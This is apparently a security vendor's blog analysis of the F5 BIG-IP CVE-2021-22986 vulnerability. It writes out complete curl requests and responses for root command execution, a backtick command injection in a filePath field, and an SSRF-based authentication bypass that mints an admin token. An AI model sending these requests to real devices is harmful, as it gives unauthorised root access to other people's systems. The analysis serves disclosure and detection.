Privia Security was chosen as one of Türkiye's fastest growing companies!

Read the News Read the News
TR EN
Blog
18 May 2021

F5 BIG-IP CVE-2021-22986 Vulnerability Detection and Analysis

F5 BIG-IP CVE-2021-22986 Vulnerability Detection and Analysis
F5 BIG-IP CVE-2021-22986 Vulnerability Detection and Analysis

Following the update published for the Unauthenticated Remote Code Execution vulnerability found in the management panel of F5 BIG-IP and BIG-IQ products under the code CVE-2021-22986, a new vulnerability has emerged.

In this article, we also touch on the previous vulnerability and share our detailed analysis of CVE-2021-22986, which was exploited again after patching.

You can use the F5 BIG-IP Scanning and Detection Tool to check whether your system is affected by this vulnerability. Our tool has been updated for both the previous and new vulnerability.

CVE-2021-22986 Vulnerability Part 1 – Code Execution

When the vulnerability (CVE-2021-22986) first emerged, requests we made to the /mgmt/tm/util/bash endpoint allowed commands to be executed without any authentication.

However, this usage was closed after the initial vulnerability was patched.

When we examine the new vulnerability, we can continue to execute commands at this endpoint and also at the /mgmt/tm/access/bundle-install-tasks endpoint. However, exploiting this vulnerability requires an administrator account.

In the new situation we face, we can exploit the vulnerability as Authenticated Remote Code Execution. Although theoretically valid, this will (in most cases) not be applicable for a real-world attacker.

At the first endpoint, /mgmt/tm/util/bash, we can send a request using the admin account with the following commands and run the id command:

# curl -ksu admin:P******3 -H "Content-Type: application/json" ***.***.5/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}' | jq .
{
    "kind": "tm:util:bash:runstate",
    "command": "run",
    "utilCmdArgs": "-c id",
    "commandResult": "uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0n"
}

In the response returned from the application, we can see in the commandResult section that our desired command executed successfully and ran with root privileges.

At the other endpoint, we enter a command input to send a ping to a computer under our own control:

# curl -ksu admin:P*****3 ***.***.5/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`ping 172.***.***.1`"}' | jq .
{
    "filePath": "`ping 172.***.***.1`",
    "toBeInstalledAppRpmsIndex": -1,
    "id": "2f1ff697-6b4f-450e-90d8-4babdd9973d2",
    "status": "CREATED",
    "userReference": {
      "link": "https://localhost/mgmt/shared/authz/users/admin"
    },
    ...
    "kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",
    "selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/2f1ff697-6b4f-450e-90d8-4babdd9973d2"
}

Unlike the previous scenario, this time we cannot see the output of our command, but when we examine the processes running on the server we can see that our command is actually being passed as a parameter to the tar command.

Note that the ping command we wrote as the Payload above was used between backquote (`) characters.

# ps aux | grep ping
root     18825  0.0  0.0  11656   320 ?        S    16:43   0:00 /bin/bash -c tar -xf `ping 172.***.***.1` -O > /dev/null
root     18826  0.0  0.0  24884   860 ?        S    16:43   0:00 ping 172.***.***.1

In the first section we examined the endpoints where we could execute commands, but we are still blocked by the authentication barrier.

CVE-2021-22986 Authentication Bypass, SSRF

The admin account scenario above demonstrates a specific way to exploit the vulnerability. However, for a real-world cyber attacker, it would not be appropriate to consider this a practically exploitable vulnerability. Attackers would prefer to be able to exploit this vulnerability without authentication.

In this section, we can use our vulnerability without authentication as described below.

A second vulnerability that constitutes CVE-2021-22986 is the SSRF usage found in the loginReference.link parameter of the /mgmt/shared/authn/login endpoint.

In other words, this endpoint can be used to make a request to any desired address. If the loginReference.link parameter is used to make the application send a request to itself, authentication can be bypassed.

As an example, we provide the parameter as https://localhost/mgmt/tm/access/bundle-install-tasks.

Can we successfully execute a command?

Unfortunately, no. Let us not forget that we also need to send certain parameters (for example, filePath) to the endpoints containing the code execution vulnerability. Even when authentication is successfully bypassed using SSRF to access the endpoints with the code execution vulnerability, the attempt will fail because we cannot send any parameters.

Cybersecurity researchers changed their perspective and were able to create a valid Authorization Token by sending a request via the SSRF vulnerability to an endpoint where tokens can be generated. F5 BIG-IP and BIG-IQ contain several endpoints that generate tokens. Sending a request to one of these endpoints is sufficient to exploit the vulnerability with unauthorised access.

In this case, /access/file-path-manager/indexing is used:

# curl -ks ***.***.5/mgmt/shared/authn/login -d '{"username":"admin", "bigipAuthCookie":"", "authProviderName":"local", "loginReference":{ "link":"https://localhost/access/file-path-manager/indexing" }, "userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"}}'  | jq .
{
  "username": "admin",
  "bigipAuthCookie": "",
  "loginReference": {
    "link": "https://localhost/access/file-path-manager/indexing"
  },
  "token": {
    "token": "WZDXLAHGSAYWEW44DZB7D34V6T",
    "name": "WZDXLAHGSAYWEW44DZB7D34V6T",
    "userName": "admin",
    "authProviderName": "local",
    ...
    "timeout": 1200,
    "startTime": "2021-05-17T18:51:26.605-0700",
    ...
    "kind": "shared:authz:tokens:authtokenitemstate",
    "selfLink": "https://localhost/mgmt/shared/authz/tokens/WZDXLAHGSAYWEW44DZB7D34V6T"
  },
  "generation": 0,
  "lastUpdateMicros": 0
}

As can be seen, in the response returned from the server, we can obtain the necessary Authorization Token in the token.token field. Now we can try to execute a command using the token we obtained, without any user credentials:

# curl -ks -H "Content-Type: application/json" -H "X-F5-Auth-Token: WZDXLAHGSAYWEW44DZB7D34V6T" ***.***.5/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}' | jq .
{
  "kind": "tm:util:bash:runstate",
  "command": "run",
  "utilCmdArgs": "-c id",
  "commandResult": "uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0n"
}

In this case, authentication was bypassed using SSRF and a valid Authorization Token was obtained. We then see that we can access the endpoints where commands are executed using this token, confirming that the vulnerability can be exploited.

The published Metasploit module also uses the unauthorised access technique described in this article.

CVE-2021-22986 Privia Security – F5 Checker

You can use the F5 Checker (CVE-2021-22986) application we have prepared specifically for organisations free of charge at f5-check.priviasecurity.com. This tool, which you can use with confidence, provides information about whether your system is affected by this vulnerability.

Our tool performs this check by running the harmless “uname -a” command on the F5 BIG IP or BIG IQ product in your system as described above. If your system is affected by this vulnerability, we recommend upgrading the product software to the latest version.

Other articles you may be interested in:

Privia Security GitHub: https://github.com/Privia-Security

You May Be Interested In These

PriviaHub W000PS Machine Walkthrough

Blog

23 March 2020

PriviaHub W000PS Machine Walkthrough

Read More
Linux Firewalls

Blog

4 July 2021

Linux Firewalls

Read More
NTP Amplification DDoS Attacks

Blog

29 May 2021

NTP Amplification DDoS Attacks

Read More